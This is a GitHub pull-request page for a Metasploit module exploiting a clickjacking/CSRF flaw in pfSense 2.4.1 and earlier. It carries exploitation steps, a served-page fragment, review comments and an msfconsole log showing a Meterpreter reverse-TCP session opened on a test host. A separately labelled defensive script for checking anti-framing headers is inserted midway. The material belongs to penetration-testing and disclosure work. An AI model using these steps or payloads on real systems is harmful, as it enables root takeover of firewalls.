
Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234

Merged
merged 6 commits into from Dec 12, 2017

8 participants
@ykoster
Contributor

ykoster commented Nov 22, 2017

This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin into interacting with a specially crafted webpage it is possible for an attacker to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, this will result in a full compromise of the pfSense instance.

Verification

The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.

  • use exploit/unix/http/pfsense_clickjacking
  • set TARGETURI https://<ip WebGUI>
  • exploit
  • Browse to the URL returned by MSF
  • Click anywhere on the returned page
  • Note that a new Meterpreter session was started.
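
The description above turns on one condition: the WebGUI page can be loaded inside a cross-origin iframe. The check below is an added example, not code from this module or from the Metasploit project, and it looks at the defensive side of that condition: it classifies an HTTP response's anti-framing headers (X-Frame-Options and the CSP frame-ancestors directive) and reports whether a browser would refuse to frame the page. All header sets in it are constructed samples, not captured from a pfSense instance.

```ruby
# Added example (not from the pfSense module or the Metasploit project):
# classify the anti-framing headers of an HTTP response. Header sets below
# are constructed samples.

# Parse a Content-Security-Policy value into { directive => [source tokens] }.
# Browsers honour only the first occurrence of a duplicated directive.
def parse_csp(value)
  value.to_s.split(';').each_with_object({}) do |part, acc|
    tokens = part.strip.split(/\s+/).reject(&:empty?)
    next if tokens.empty?
    name = tokens.shift.downcase
    acc[name] = tokens unless acc.key?(name)
  end
end

# Case-insensitive header lookup over a plain Hash of name => value.
def header(headers, name)
  key = headers.keys.find { |k| k.to_s.casecmp?(name) }
  key && headers[key]
end

# Decide whether the response forbids cross-origin framing.
# Returns [protected?, reason].
def framing_protection(headers)
  csp = parse_csp(header(headers, 'Content-Security-Policy'))
  if (ancestors = csp['frame-ancestors'])
    # CSP Level 2: when frame-ancestors is present, X-Frame-Options is ignored.
    sources = ancestors.map(&:downcase)
    return [false, 'CSP frame-ancestors allows any origin (*)'] if sources.include?('*')
    return [true, "CSP frame-ancestors restricted to #{sources.join(' ')}"]
  end

  xfo = header(headers, 'X-Frame-Options')
  if xfo
    case xfo.strip.upcase
    when 'DENY', 'SAMEORIGIN'
      return [true, "X-Frame-Options #{xfo.strip.upcase}"]
    when /\AALLOW-FROM/
      return [false, 'X-Frame-Options ALLOW-FROM is obsolete and ignored by current browsers']
    else
      return [false, "unrecognised X-Frame-Options value #{xfo.inspect}; browsers do not reliably enforce it"]
    end
  end

  [false, 'no anti-framing header; the page can be embedded in a cross-origin iframe']
end

# Constructed sample headers: a response without any anti-framing header
# (the condition a clickjacking page relies on) and a hardened response.
UNPROTECTED_HEADERS = {
  'Content-Type' => 'text/html; charset=UTF-8',
  'Set-Cookie'   => 'PHPSESSID=constructed-sample; path=/; secure; HttpOnly'
}.freeze

HARDENED_HEADERS = {
  'Content-Type'            => 'text/html; charset=UTF-8',
  'X-Frame-Options'         => 'SAMEORIGIN',
  'Content-Security-Policy' => "default-src 'self'; frame-ancestors 'self'"
}.freeze

if __FILE__ == $PROGRAM_NAME
  { 'unprotected' => UNPROTECTED_HEADERS, 'hardened' => HARDENED_HEADERS }.each do |label, h|
    ok, reason = framing_protection(h)
    puts "#{label}: #{ok ? 'PROTECTED' : 'VULNERABLE'} (#{reason})"
  end
end
```

Both headers are sent in the hardened sample on purpose: frame-ancestors is what current browsers enforce and takes precedence, while X-Frame-Options covers older clients that predate CSP Level 2. A wildcard frame-ancestors or an ALLOW-FROM value is reported as unprotected because neither stops a modern browser from framing the page.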

ykoster added some commits Nov 22, 2017

resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />


@jvoisin

jvoisin Nov 27, 2017

Contributor

I don't think that we want to depend on external javascript :/

@ykoster


Contributor

ykoster commented Dec 2, 2017

Included static content as suggested by @jvoisin

@wchen-r7 wchen-r7 self-assigned this Dec 12, 2017

@wchen-r7


Contributor

wchen-r7 commented Dec 12, 2017

Works as advertised:

msf exploit(pfsense_clickjacking) > show options

Module options (exploit/unix/http/pfsense_clickjacking):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   SRVHOST    0.0.0.0               yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  http://172.16.85.132  yes       The base path to the web application
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.85.1      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   pfSense <= 2.4.1


msf exploit(pfsense_clickjacking) > set srvhost 172.16.85.1
srvhost => 172.16.85.1
msf exploit(pfsense_clickjacking) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/vB3oWRYgtwaFtR
[*] Server started.
msf exploit(pfsense_clickjacking) > [*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.css Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.js Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/background.jpg Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] Sending stage (37543 bytes) to 172.16.85.132
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.132:43529) at 2017-12-12 14:25:36 -0600

@wchen-r7 wchen-r7 merged commit 942e44c into rapid7:master Dec 12, 2017

2 checks passed

Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Dec 12, 2017

@wchen-r7


Contributor

wchen-r7 commented Dec 12, 2017

Release Notes

This exploits a CSRF in pfSense that allows the attacker to perform a click-jacking attack.

@stevenseeley


Contributor

stevenseeley commented Dec 12, 2017

I know this is already merged, but I am just curious, where in the module is the csrf click jacking page used (csrf-magic.php) as per the blog post? This looks like a csrf attack to diag_command.php, in which case, no clicky is required.

@h00die


Contributor

h00die commented Dec 12, 2017

Line 82 shows diag_command.php as the target

@stevenseeley


Contributor

stevenseeley commented Dec 13, 2017

huh, where? also, my point still stands. This is csrf isn't it?

@stevenseeley


Contributor

stevenseeley commented Dec 13, 2017

Yep, I see how it's working now. My bad.

@ykoster


Contributor

ykoster commented Dec 13, 2017

I suppose targeting the file editor would also work, less trivial though

@tdoan-r7 tdoan-r7 added the rn-exploit label Dec 20, 2017
